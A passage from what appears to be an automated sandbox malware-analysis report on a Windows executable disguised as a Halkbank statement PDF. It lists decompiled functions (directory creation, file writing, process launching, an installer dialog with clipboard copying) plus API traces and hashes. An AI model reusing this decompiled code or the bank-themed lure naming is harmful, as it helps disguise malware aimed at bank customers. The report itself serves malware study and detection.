                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                          • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                          • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                          0x00405c1c
                                          0x00405c24
                                          0x00000000
                                          0x00405c2a
                                          0x00000000

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                          • GetLastError.KERNEL32 ref: 00405C2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                          • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                          • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x0040620e
                                          0x0040621e
                                          0x00406226
                                          0x00000000
                                          0x0040622d
                                          0x00000000
                                          0x0040622f

                                          APIs
                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040E9E4,0040CEF0,00403579,0040CEF0,0040E9E4,esent,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                          0x00403606
                                          0x0040360c

                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                          0x00401faa
                                          0x00401faf
                                          0x00401fb5
                                          0x00401fba
                                          0x00401fbe
                                          0x0040292e
                                          0x00401fc4
                                          0x00401fc7
                                          0x00401fca
                                          0x00401fd2
                                          0x00401fe1
                                          0x00401fe3
                                          0x00401fe3
                                          0x00401fd4
                                          0x00401fd8
                                          0x00401fd8
                                          0x00401fd2
                                          0x00401fea
                                          0x00401feb
                                          0x00401feb
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                            • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                            • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                            • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                            • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 2972824698-0
                                          • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                          • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                          • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                          • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                          0x00405811
                                          0x00405817
                                          0x00405821
                                          0x00405824
                                          0x004059ba
                                          0x004059de
                                          0x004059de
                                          0x004059f1
                                          0x00405a0f
                                          0x00405a11
                                          0x00405a19
                                          0x00405a6f
                                          0x00405a73
                                          0x00000000
                                          0x00000000
                                          0x00405a75
                                          0x00405a7b
                                          0x00000000
                                          0x00000000
                                          0x00405a85
                                          0x00405a8d
                                          0x00405a90
                                          0x00405b92
                                          0x00000000
                                          0x00405b92
                                          0x00405a9f
                                          0x00405aaa
                                          0x00405ab3
                                          0x00405abe
                                          0x00405ac1
                                          0x00405aca
                                          0x00405ad0
                                          0x00405ad3
                                          0x00405ad3
                                          0x00405aeb
                                          0x00405af4
                                          0x00405af7
                                          0x00405afe
                                          0x00405b05
                                          0x00405b0d
                                          0x00405b0d
                                          0x00405b24
                                          0x00405b24
                                          0x00405b2b
                                          0x00405b31
                                          0x00405b3d
                                          0x00405b44
                                          0x00405b4d
                                          0x00405b4f
                                          0x00405b52
                                          0x00405b61
                                          0x00405b64
                                          0x00405b6a
                                          0x00405b6b
                                          0x00405b71
                                          0x00405b72
                                          0x00405b73
                                          0x00405b7b
                                          0x00405b86
                                          0x00405b8c
                                          0x00405b8c
                                          0x00000000
                                          0x00405aeb
                                          0x00405a21
                                          0x00405a51
                                          0x00405a59
                                          0x00405a64
                                          0x00405a64
                                          0x00405a6a
                                          0x00000000
                                          0x00405a6a
                                          0x00405a25
                                          0x00405a2f
                                          0x00000000
                                          0x004059f3
                                          0x004059f9
                                          0x00405a34
                                          0x00000000
                                          0x00405a3d
                                          0x00405a02
                                          0x00405a07
                                          0x00405a0a
                                          0x00000000
                                          0x00405a0a
                                          0x004059f1
                                          0x0040582a
                                          0x0040582e
                                          0x00405836
                                          0x0040583a
                                          0x0040583d
                                          0x00405840
                                          0x00405843
                                          0x00405846
                                          0x00405847
                                          0x00405848
                                          0x00405861
                                          0x00405864
                                          0x0040586e
                                          0x0040587d
                                          0x00405885
                                          0x0040588d
                                          0x00405892
                                          0x00405895
                                          0x004058a1
                                          0x004058aa
                                          0x004058b3
                                          0x004058d5
                                          0x004058db
                                          0x004058ec
                                          0x004058f1
                                          0x004058ff
                                          0x0040590d
                                          0x0040590d
                                          0x00405912
                                          0x00405920
                                          0x00405920
                                          0x00405925
                                          0x00405928
                                          0x0040592d
                                          0x00405939
                                          0x00405942
                                          0x0040594f
                                          0x0040595e
                                          0x00405951
                                          0x00405956
                                          0x00405956
                                          0x0040596a
                                          0x0040596a
                                          0x0040597e
                                          0x00405987
                                          0x00405990
                                          0x004059a0
                                          0x004059ac
                                          0x004059ac
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32 ref: 00405867
                                          • GetDlgItem.USER32 ref: 00405876
                                          • GetClientRect.USER32 ref: 004058B3
                                          • GetSystemMetrics.USER32 ref: 004058BA
                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                          • ShowWindow.USER32(?,00000008), ref: 00405956
                                          • GetDlgItem.USER32 ref: 00405977
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                          • GetDlgItem.USER32 ref: 00405885
                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                          • GetDlgItem.USER32 ref: 004059C9
                                          • CreateThread.KERNEL32 ref: 004059D7
                                          • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                          • ShowWindow.USER32(00000000), ref: 00405A02
                                          • ShowWindow.USER32(?,00000008), ref: 00405A07
                                          • ShowWindow.USER32(00000008), ref: 00405A51
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                          • CreatePopupMenu.USER32 ref: 00405A96
                                          • AppendMenuW.USER32 ref: 00405AAA
                                          • GetWindowRect.USER32 ref: 00405ACA
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                          • OpenClipboard.USER32(00000000), ref: 00405B2B
                                          • EmptyClipboard.USER32 ref: 00405B31
                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                          • GlobalLock.KERNEL32 ref: 00405B47
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                          • SetClipboardData.USER32 ref: 00405B86
                                          • CloseClipboard.USER32 ref: 00405B8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: H7B${
                                          • API String ID: 590372296-2256286769
                                          • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                          • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                          • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                          • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
